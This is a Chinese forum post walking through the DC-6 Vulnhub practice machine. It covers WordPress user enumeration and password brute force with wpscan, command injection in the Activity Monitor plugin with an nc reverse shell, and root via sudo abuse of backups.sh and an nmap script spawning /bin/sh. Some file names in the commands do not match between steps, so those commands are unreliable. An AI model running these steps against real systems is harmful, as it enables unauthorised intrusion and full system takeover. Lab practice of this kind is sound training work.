-
-
[原创]小蜘蛛带你一起学习DC-6
-
发表于:
2021-3-5 23:37
4713
-
Vunlnhub靶机DC-6
*注:请严格遵守网络安全法,本文章以培养网络安全人才为核心。
DC-6 靶机实战(DC-)
DC-6 靶机
信息收集
nmap扫描结果
查看cms
注意修改名称解析
得知cms使用的wordpress
扫描站点
对站点进行目录扫描
扫描出登录窗口
是一个后台登录页面
枚举站点用户
1 | wpscan - - url http: / / wordy - e u
|
将文件拷贝到dcname.txt中
使用工具截取出用户名
1 | grep [ + ] dc6name.txt | awk '{print $2}' > dc - 6 - user.txt
|
现在用户名有了,管理员登录后台页面也有了,那我们就可以进行暴力破解了
暴力破解
1 | wpscan - - url http: / / Wordy - U dc - 6 - uname - P / usr / share / wordlists / rockyou.txt
|
暴力破解需要很长很长的时间
登录后台页面
可以看到安装了activity_monitor插件
search看一下有没有漏洞
1 | searchsploit wordpress activity monitor
|
1 | cp / usr / share / exploitdb / exploits / php / webapps / 45274.html . /
|
命令注入漏洞
验证发现,存在命令注入漏洞
打开浏览器代理,反弹到burpsuite
进入Repeater模块
使用nc反向连接kali
查看账号信息
这里我们拿到了一个用户和口令
提权
进入后查看当前用户可执行的操作
发现我们可以运行jens用户下面的backups.sh
1 2 | echo / bin / bash >> backups.sh
sudo - u jens . / backups.sh
|
执行后我们就进入到了jens用户下
我们发现nmap拥有root执行权限
我们继续使用nmap去调用我们的脚本例如/bin/bash.
nmap有执行脚本的功能,通过编写特殊脚本,可以实现利用nmap提权(sudo提权)
利用过程:写入一个执行bash的nmap脚本,运行
1 2 | echo 'os.execute("/bin/sh")' > getShell
sudo nmap - - script = / tmp / root.nse
|
提权成功!
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!